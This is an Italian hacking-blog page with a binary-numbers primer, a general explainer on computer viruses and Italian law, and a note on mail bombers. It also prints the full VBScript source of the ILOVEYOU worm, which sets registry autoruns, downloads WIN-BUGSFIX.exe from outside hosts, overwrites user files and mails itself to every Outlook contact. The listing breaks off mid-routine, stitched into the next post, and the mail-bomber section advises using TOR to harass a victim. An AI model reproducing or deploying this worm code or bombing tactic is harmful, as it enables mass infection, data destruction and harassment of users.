DISCLAIMER!

Le informazioni (e i download, quindi tutti i file contenuti nel blog) da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio e/o illecito delle tecniche e dei programmi qui descritti e di tutti i danni a cose e persone e/o perdite di guadagni che ne possano derivare. Il blog non vuole istigare nessuno a delinquere o a commettere reati. Le tecniche qui descritte sono da utilizzare a proprio rischio e pericolo.

Traduci Il Blog In




Cerca in Xthreme Hacking!

Codice Binario

Ecco qui un altro po' di teoria... Adesso parleremo del codice binario... non è indispensabilissimo da sapere, ma fa sempre molto comodo:
Definizione by Wikipedia:
Il sistema numerico binario è un sistema numerico posizionale in base 2, cioè che utilizza 2 simboli, tipicamente 0 e 1, invece dei 10 del sistema numerico decimale tradizionale. Di conseguenza, la cifra in posizione n (da destra) si considera moltiplicata per 2(n − 1) anziché per 10(n − 1) come avviene nella numerazione decimale.

Nella seguente tabella sono confrontate le rappresentazioni binarie, esadecimali e decimali di alcuni numeri:


Il sistema numerico binario è usato in informatica per la rappresentazione interna dei numeri, grazie alla semplicità di realizzare fisicamente un elemento con due stati anziché un numero di stati superiore, ma anche per la corrispondenza con i valori logici di vero e falso.




Il sistema numerico binario ha molti padri. Il primo a proporne l'uso fu Juan Caramuel con la pubblicazione del volume "Mathesis biceps. Vetus, et noua" (1669) pubblicata nella sua sede vescovile di Campagna in provincia di Salerno. Se ne trova traccia anche nelle opere di Nepero. Successivamente, il matematico tedesco Gottfried Wilhelm Leibniz ne studiò per primo l'aritmetica. Questa è la ragione per cui questo sistema di numerazione è considerato tra le sue più grandi invenzioni. Però non ebbe un seguito immediato. L'aritmetica binaria venne ben presto dimenticata e riscoperta solo nel 1847 grazie al matematico inglese George Boole che aprirà l'orizzonte alle grandi scuole di logica matematica del '900 e soprattutto alla nascita del calcolatore elettronico.
La formula per convertire un numero da binario a decimale (dove con d si indica la cifra di posizione n all'interno del numero, partendo da 0) è

I Love You!

Per i piu esperti certamente quello che segue è una chicca, i love you è, o meglio, ERA un potentissimo virus.

Eccone le caratteristiche principali:
Estato scritto in VBScript e circa 9 anni fa.
Si “sistema” nella cartella system generalmente nella forma LOVE-LETTER-FOR-YOU.TXT.vbs.
All’esecuzione modifica il registro in modo da avviarsi ad ogni riavvio del pc (ovviamente). Scarica automaticamente WIN-BUGSFIX.exe (un altro suo componente) ed anche esso viene posto in esecuzione automatica.
Tutti i file con estensione vbs,js,jpg,mp3 ed alcuni altri formati li nasconde e viene creata una copia del virus con lo stesso nome dei file nascosti, ma con estensione “.vbs” così da non destar sospetti nei confronti di chi non ha la visualizzazione dei file nascosti e l’estensione dei file, abilitati (facilmente individuabile quindi…anche se l’utente medio in genere non ha abilitate quelle funzioni).
Si moltiplica tramite Outlook inviando un’e-mail con una copia di se stesso a tutti i contatti della propria rubrica e tramite Mirc modificando dei file per poi inviare una copia, sempre di se stesso (senza che ve ne accorgiate), a tutti quelli che entrano nei canali in cui ci si trova.
Poi non c’è che dire, ancora una volta, grande microsoft! Perchè? Perchè questo virus nacque proprio grazie ad una funzionalità altamente discutibile di Outlook (tramite il quale appunto si propagava e questa funzionalità consisteva nel far eseguire al client di posta elettronica “comandi” impartiti tramite e-mail).
E finalmente ecco il sorgente:

em barok -loveletter(vbe)

rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines

On Error Resume Next

dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow

eq=”"

ctr=0

Set fso = CreateObject(”Scripting.FileSystemObject”)

set file = fso.OpenTextFile(WScript.ScriptFullname,1)

vbscopy=file.ReadAll

main()

sub main()

On Error Resume Next

dim wscr,rr

set wscr=CreateObject(”WScript.Shell”)

rr=wscr.RegRead(”HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout”)

if (rr>=1) then

wscr.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout”,0,”REG_DWORD”

end if

Set dirwin = fso.GetSpecialFolder(0)

Set dirsystem = fso.GetSpecialFolder(1)

Set dirtemp = fso.GetSpecialFolder(2)

Set c = fso.GetFile(WScript.ScriptFullName)

c.Copy(dirsystem&”MSKernel32.vbs”)

c.Copy(dirwin&”Win32DLL.vbs”)

c.Copy(dirsystem&”LOVE-LETTER-FOR-YOU.TXT.vbs”)

regruns()

html()

spreadtoemail()

listadriv()

end sub

sub regruns()

On Error Resume Next

Dim num,downread

regcreate “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMSKernel32″,dirsystem&”MSKernel32.vbs”

regcreate “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesWin32DLL”,dirwin&”Win32DLL.vbs”

downread=”"

downread=regget(”HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerDownload Directory”)

if (downread=”") then

downread=”c:”

end if

if (fileexist(dirsystem&”WinFAT32.exe”)=1) then

Randomize

num = Int((4 * Rnd) + 1)

if num = 1 then

regcreate “HKCUSoftwareMicrosoftInternet ExplorerMainStart Page”,”http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe”

elseif num = 2 then

regcreate “HKCUSoftwareMicrosoftInternet ExplorerMainStart Page”,”http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe”

elseif num = 3 then

regcreate “HKCUSoftwareMicrosoftInternet ExplorerMainStart Page”,”http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe”

elseif num = 4 then

regcreate “HKCUSoftwareMicrosoftInternet ExplorerMainStart Page”,”http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe”

end if

end if

if (fileexist(downread&”WIN-BUGSFIX.exe”)=0) then

regcreate “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunWIN-BUGSFIX”,downread&”WIN-BUGSFIX.exe”

regcreate “HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page”,”about:blank”

end if

end sub

sub listadriv

On Error Resume Next

Dim d,dc,s

Set dc = fso.Drives

For Each d in dc

If d.DriveType = 2 or d.DriveType=3 Then

folderlist(d.path&”")

end if

Next

listadriv = s

end sub

sub infectfiles(folderspec)

On Error Resume Next

dim f,f1,fc,ext,ap,mircfname,s,bname,mp3

set f = fso.GetFolder(folderspec)

set fc = f.Files

for each f1 in fc

ext=fso.GetExtensionName(f1.path)

ext=lcase(ext)

s=lcase(f1.name)

if (ext=”vbs”) or (ext=”vbe”) then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

elseif(ext=”js”) or (ext=”jse”) or (ext=”css”) or (ext=”wsh”) or (ext=”sct”) or (ext=”hta”) then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

bname=fso.GetBaseName(f1.path)

set cop=fso.GetFile(f1.path)

cop.copy(folderspec&”"&bname&”.vbs”)

fso.DeleteFile(f1.path)

elseif(ext=”jpg”) or (ext=”jpeg”) then

set ap=fso.OpenTextFile(f1.path,2,true)

ap.write vbscopy

ap.close

set cop=fso.GetFile(f1.path)

cop.copy(f1.path&”.vbs”)

fso.DeleteFile(f1.path)

elseif(ext=”mp3″) or (ext=”mp2″) then

set mp3=fso.CreateTextFile(f1.path&”.vbs”)

mp3.write vbscopy

mp3.close

set att=fso.GetFile(f1.path)

att.attributes=att.attributes+2

end if

if (eq<>folderspec) then

if (s=”mirc32.exe”) or (s=”mlink32.exe”) or (s=”mirc.ini”) or (s=”script.ini”) or (s=”mirc.hlp”) then

set scriptini=fso.CreateTextFile(folderspec&”script.ini”)

scriptini.WriteLine “[script]”

scriptini.WriteLine “;mIRC Script”

scriptini.WriteLine “; Please dont edit this script… mIRC will corrupt, if mIRC will”

scriptini.WriteLine ” corrupt… WINDOWS will affect and will not run correctly. thanks”

scriptini.WriteLine “;”

scriptini.WriteLine “;Khaled Mardam-Bey”

scriptini.WriteLine “;http://www.mirc.com”

scriptini.WriteLine “;”

scriptini.WriteLine “n0=on 1:JOIN:#:{”

scriptini.WriteLine “n1= /if ( $nick == $me ) { halt }”

scriptini.WriteLine “n2= /.dcc send $nick “&dirsystem&”LOVE-LETTER-FOR-YOU.HTM”

scriptini.WriteLine “n3=}”

scriptini.close

eq=folderspec

end if

end if

next

end sub

sub folderlist(folderspec)

On Error Resume Next

dim f,f1,sf

set f = fso.GetFolder(folderspec)

set sf = f.SubFolders

for each f1 in sf

infectfiles(f1.path)

folderlist(f1.path)

next

end sub

sub regcreate(regkey,regvalue)

Set regedit = CreateObject(”WScript.Shell”)

regedit.RegWrite regkey,regvalue

end sub

function regget(value)

Set regedit = CreateObject(”WScript.Shell”)

regget=regedit.RegRead(value)

end function

function fileexist(filespec)

On Error Resume Next

dim msg

if (fso.FileExists(filespec)) Then

msg = 0

else

msg = 1

end if

fileexist = msg

end function

function folderexist(folderspec)

On Error Resume Next

dim msg

if (fso.GetFolderExists(folderspec)) then

msg = 0

else

msg = 1

end if

fileexist = msg

end function

sub spreadtoemail()

On Error Resume Next

dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad

set regedit=CreateObject(”WScript.Shell”)

set out=WScript.CreateObject(”Outlook.Application”)

set mapi=out.GetNameSpace(”MAPI”)

for ctrlists=1 to mapi.AddressLists.Count

set a=mapi.AddressLists(ctrlists)

x=1

regv=regedit.RegRead(”HKEY_CURRENT_USERSoftwareMicrosoftWAB”&a)

if (regv=”") then

regv=1

end if

if (int(a.AddressEntries.Count)>int(regv)) then

for ctrentries=1 to a.AddressEntries.Count

malead=a.AddressEntries(x)

regad=”"

regad=regedit.RegRead(”HKEY_CURRENT_USERSoftwareMicrosoftWAB”&malead)

if (regad=”") then

set male=out.CreateItem(0)

male.Recipients.Add(malead)

male.Subject = “ILOVEYOU”

male.Body = vbcrlf&”kindly check the attached LOVELETTER coming from me.”

male.Attachments.Add(dirsystem&”LOVE-LETTER-FOR-YOU.TXT.vbs”)

male.Send

regedit.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWAB”&malead,1,”REG_DWORD”

end if

x=x+1

next

regedit.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWAB”&a,a.AddressEntries.Count

else

regedit.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWAB”&a,a.AddressEntries.Count

end if

next

Set out=Nothing

Set mapi=Nothing

end sub

sub html

On Error Resume Next

dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6

dta1=”

Virus, What?!


Ecco per i piu nabbi un bel post dove viene spiegato a grandi linee cosa sono i virus:
Come da argomento in oggetto, sono ad esporvi alcune informazioni sui virus informatici….
chi è che non sa cosa è un virus informatico?? ebbene il più delle volte le persone credono di saperlo dicendo frasi del tipo: “è un file dannoso per il sistema….” oppure “è un file pericoloso…..” e molti entrano in panico….ma in realtà ci sono molte persone che non sanno nè cosa sia effettivamente, nè cosa tende a fare a seconda del tipo e dello scopo…
così ho pensato che fornirvi qualche informazione potesse essere d’aiuto…
(da ora in poi mi limiterò a chiamarli soltanto virus per abbreviare)
allora cominciamo col dire:
Cosa è un virus??
innanzi tutto un virus (nome dal latino, significa “veleno”) non è altro che un programma che può scrivere un qualsiasi programmatore, di conseguenza questo porta all’affermazione che il virus non svolge le sue azioni autonomamente (essendo anch’esso un programma), ma svolge le azioni previste dal programmatore che le ha impartite, nulla di più e nulla di meno. Detto diversamente, i virus non posseggono nè autonomia nè intelligenza, in quanto sono caratterizzati semplicemente da istruzioni ben precise che esguono come qualsiasi altro programma…..diciamo invece che l’intelligenza l’ha avuta il programmatore a farlo  (ovviamente riferito alla creazione , non allo scopo )
Concludo: un virus è un programma piccolo rispetto alla sua “preda” che deve invadere, infatti esso non supera il migliaio di istruzioni….e questo è un vantaggio da parte sua, perchè meno sono le istruzioni e la dimensione e più difficile è notare la sua presenza.
Quando un programma può definirsi un virus??
il virus è tale quando segue alcune caratteristiche fondamentali di base:
la prima cosa che viene alla mente è sicuramente l’aspetto più evidente ed intuibile che esso possa fare, cioè la replicazione (come i nostri virus biologici), infatti esso è stato creato per confondersi fra i programmi (cioè penetrare nelle loro istruzioni), e copiare le proprie istruzioni al loro interno per ottenerne il controllo, creando così i propri “cloni” e diffondendosi. Questa è la prima azione che, solitamente, viene effettuata dal virus (anche se non sempre può essere così), e non è ancora considerata veramente dannosa, in quanto è vero che si è moltiplicato, ma ancora non ha cominciato ad agire “dannosamente”, cioè ad attaccare.
Successivamente passato un tempo prestabilito dal programmatore (datogli per potersi replicare), il virus comincia ad effettuare il lavoro per cui è stato creato, cioè comincia ad attaccare eseguendo le sue istruzioni nocive, le quali possono avere diversi scopi, per esmpio: distruggere dati, alterare i dati di sistema in modo che da compromettere l’avvio del sistema operativo, o semplicemente visualizzare un messaggio a video, ecc…
Come trovare un virus??
il virus può essere rintracciato grazie ad appositi programmi denominati “antivirus”. Questi infatti per scoprire l’ospite sgradito eseguono un controllo di tutti i programmi (file per file), ricercando in loro la sequenza di istruzioni del virus (la stessa usata per replicarsi). Attenzione però, se avete un antivirus non è detto che il virus venga rilevato, questo perchè l’antivirus deve conoscere la sequenza di istruzioni con cui il virus è stato scritto, o almeno ne deve conoscere una parte, e dato che ogni virus ha un set di istruzioni differenete bisogna conoscerle tutte, per questo aggiornamenti su aggiornamenti vengono rilasciati quaotidianamente dalle case del software antivirus. Altrettanto vero è, che ormai gli antivirus possiedo la “scansione euristica”, cioè quel tipo di scansione che ha il compito di rilevare le “possibili” nuove minacce che non sono ancora state scoperte, cioè verifica le attività anomale e confronta il set di istruzioni con quelli dannosi che conosce già, per vedere se ci sono delle similitudini. Meglio di niente no?!
Un virus funziona ovunque??
No, il virus non funziona ovunque…
Ricordo ancora che esso è un programma, e come tutti i programmi, può “vivere” solamente nel sistema operativo per il quale è stato creato, cioè il suo set di istruzioni non viene eseguito….per farvi un esmpio lampante, un virus creato per sistema Windows è totalmente innocuo se messo in un sistema Macintosh.
Come viene creato un virus??
In passato (anche oggi, ma molto meno) un virus veniva creato con un linguaggio a “basso livello” (es. Assembly), cioè il linguaggio più vicino a quello della macchina, o se preferite del microprocessore. Questo perchè bisognava lavorare direttamente sui singoli bit e bytes ed usufruire dei registri del microprocessore per poter immagazzinare i valori desiderati. Il linguaggio di basso livello richiede più tempo nel programmare, in quanto non gestisce automaticamente la locazione dei valori, ma necessita ogni volta che gli venga specificato dove memorizzare i dati. A parte questo, però, presenta alcune caratteristiche veramente efficaci nella programmazione: infatti grazie ad esso si riesce a notare qualsiasi azione viene compiuta nel PC, cioè tutte le operazioni eseguite (copia, creazione, eliminazione) vengono intercettate, e quindi questo è già un aspetto che ci fa capire che per creare un virus è un linguaggio ideale; altra caratteristica è che possono usufruire degli Interrupt, cioè permettono istruzioni che compiono operazioni direttamente sull’hardware senza l’utilizzo di routine di sistema.
Fortunatamente i virus creati con questo metodo riguardano solo MS-DOS, infatti in seguito, con la nascita dei sistemi operativi ad interfaccia grafica, la creazione di virus risulta più difficile a partire da Windows 95/98, e si incrementa sempre ed ancora di più la difficoltà con l’avvento di Windows NT/2000/XP/VISTA; questo aumento di difficoltà perchè questi sistemi operativi hanno implementato protezioni che impediscono ai programmi di eseguire istruzioni a basso livello dirette.
Ovviamente ragazzi, i sistemi operativi si sono evoluti, ma si sono evoluti anche i linguaggi, infatti per creare virus è molto usato il Visual Basic Script, perchè combina in sè l’efficacia e la semplicità di utilizzo; in poche parole È e SARA’ sempre una lotta aperta…..come la classica lotta fra bene e male
La diffusione di un virus, come avviene??
Premetto immediatamente una cosa: il virus non si crea da solo nel PC, il virus lo si contrae per diffusione, cioè si viene contagiati da una sorgente infetta.
Detto questo è già intuibile la spiegazione che sto per darvi; i virus ai tempi del MS-DOS e fino ad oggi sono stati diffusi, per lo più, attraverso i supporti magnetici, cioè floppy disk da 3.5″ e anche se meno da floppy disk da 5.25″, contagiando file .exe, .com, o addirittura il settore di avvio, in questo caso non si nota nulla subito, ma se l’utente lascia inserito il floppy allo spegnimento del PC, quando lo riaccenderà lo riavvierà, il boot accederà al floppy come di consueto, permettendo al virus di contaminare il disco rigido o qualsiasi cosa collegato al PC.
La diffusione può avvenire anche attraverso un CD-ROM se al momento della masterizzazione viene inciso il virus, anche se questo metodo è rarissimo se il supporto e di origine commerciale, in quanto prima di essere messo in commercio, il disco è sottoposto a rigidi controlli…mentre può essere facile se il disco è stato fatto, per esmpio da un amico, o se è stato eseguito un backup di dati già infetti presenti sul disco fisso.
Una rete locale è un ottimo sistema di diffusione, per esempio è sufficiente contaminare dei file condivisi, che ogni utente ha bisogno per poter lavorare, o ancora più efficace è la contaminazione del server che gestisce la rete, ma anche un singolo client infetto è un grave problema all’interno di una rete di PC ve lo assicuro.
Per finire ragazzi, il contenitore più ampio del mondo per i virus è Internet, infatti è strettamente consigliabile l’uso di programmi di protezione quali antivirus (sempre aggiornati!!), firewall, antispyware, ecc….
Infatti entrando in alcuni siti internet, a chi non è mai capitato che l’antivirus vi visualizza un messaggio di allarme, nel quale dice che è stato visualizzato un virus?! molti virus sono diffusi utilizzando l’Hyper Text Transfer Protocol (HTTP) specialmente….sempre rimanendo nel tema di internet, parlo un attimo della diffusione di virus tramite e-mail: questo sistema di diffusione, anzi di vera replicazione, è stata una trovata ahimè molto intelligente, cioè il virus in questo caso viene inviato come allegato in un messaggio di posta elettronica, l’utente lo riceve, decide di visualizzare l’allegato o aprendolo o salvandolo sul disco fisso, ed esegue il programma che legge immediatamente la rubrica degli indirizzi e-mail ed invia immediatamente un messaggio di posta elettronica identico a quello arrivato all’utente che l’ha aperto; fatto questo (se vi ricordate ciò che vi ho detto precedentemente) ora il virus che si è replicato comincia ad entrare in azione per compiere il suo scopo, fare ciò per cui è stato creato (distruggere, visualizzare messaggi a video, ecc).
Perciò ragazzi vi do soltanto un consiglio: diffidate di e-mail con nittente sconosciuto, o di messaggi strani…mai aprire gli allegati, eliminate subito ogni tipo di queste e-mail, e non fatevi divorare dalla curiosità perchè di curioso non c’è nulla, sono solo trappole !!
Perchè viene creato un virus??
Bhè ragazzi, questa è una domanda aperta in cui i motivi possono essere veramente molti.
Si pensa, solitamente, che colui che crea il virus è un programmatore non contento della sua posizione, che porta in sè quel senso di amarezza dovuto a motivi che potrebbero essere: l’insoddisfazione nel mondo del lavoro, la delusione per essere sottovalutati, l’impossibilità di manifestare la propria opinione, lo scarso guadagno economico non proporzionato alla sua professionalità, ecc.
I motivi possono essere parecchi ed essi, uniti alla voglia di dimostrare al mondo le proprie potenzialità e capacità, portano il programmatore a creare tali programmi per potersi così vendicare delle ingiustizie subite, e portarsi al centro dell’attenzione per dimostrare il suo talento.
Un altro esempio fu uno dei primi creatori di virus più famosi che faceva chiamare “Dark Avenger” il quale, come dice il nome, voleva portare l’uomo allo stesso livello della macchina, in quanto si pensava che la macchina fosse un qualche cosa di perfetto che eseguisse alla perfezione i programmi impartiti dai creatori. Così il vendicatore oscuro, per dimostrare a tutti che il ruolo centrale spetta all’uomo e non alla macchina, decise di creare programmi particolari, quali i virus, in modo tale che anche la macchina si “ammalasse” come è possibile che accada ad una persona, di conseguenza annullando l’idea di perfezione che ormai tutti si erano posti.
Oltre tutto colui che crea il virus, dimostra di creare un programma avente una propria capacità che lo contraddistingue da tutti gli altri, e come già vi ho detto e descritto in precedenza, questa capacità è la replicazione, o se preferite riproduzione, la continua creazione cloni nel tempo.
Questi sono alcuni dei motivi che si pensa siano la causa della creazione di programmi dannosi, ma in realtà un programmatore volendo potrebbe creare un virus, oltre che per far notare le potenzialità, solo per creare disordine….comunque resta il fatto che i virus ci sono e sempre ci saranno….
La legge come reagisce con i virus??
Ebbene ragazzi la legge non tollera la creazione di programmi che abbiano come scopo quello di fare danno.
La legge punisce, di conseguenza, non solo chi crea virus ma anche chi li diffonde intenzionalmente e consapevolmente delle conseguenze che questo porta.
La legge 547/93 con i suoi tanti articoli, cita testualmente le seguenti parole: “Chiunque diffonde, comunica o consegna un programma informatico da lui stesso o da altri redatto, avente per scopo o per effetto il danneggiamento di un sistema informatico o telematico dei dati o dei programmi in esso contenuti o ad esso pertinenti, ovvero l’interruzione totale o parziale del suo funzionamento, è punito con la reclusione fino a due anni e con la multa sino a lire venti milioni.” (confido che abbiano cambiato il valore in euro )
Questo caso punisce l’azione dolosa della diffusione, ma ragazzi attenzione anche l’azione colposa è punibile con la legge, infatti l’articolo 2043 del codice civile cita le seguenti parole: “Qualunque fatto doloso o colposo, che cagiona ad altri un danno ingiusto, obbliga colui che ha commesso il fatto a risarcire il danno”.
Quindi attenzione, perchè anche se non vi era intenzione nella diffusione, basta la colpa per dover risarcire i danni al/ai malcapitato/i.
Questa, diciamo guida, ha lo scopo di mettervi al corrente ed in guardia dai virus, è breve e generale. Piu avanti verranno esposti altri tipi di "virus" quali worm, trojan, backdoor, ecc.

Mail Bomber


Ecco una piccola (molto piccola) delucidazione sui mail bomber:
Mail bomber:
Tecnica molto facile ma se usata bene può essere fatale per l’email della vittima, bombardandola di posta inutile che puo contenere anche file dannosi e pericolosi. (per chi ha 2 in inglese cazzi suoi! mettiti a studiare!).
Come funziona?
Dopo aver impostato l’indirizzo della vittima ed eventuale server e mittente falso, sceglierete quante belle letterine dovranno essere recapitate al povero utente, che verrà sommerso da posta inutile.
Naturalmente non vengo scoperto!?
Certo che vieni scoperto! Idiota! il tuo ip (Internet Protocol) con questi programmi viene visualizzato e si può facilmente risalire a te (consiglio di utilizzare il programma per navigare anonimi, come TOR).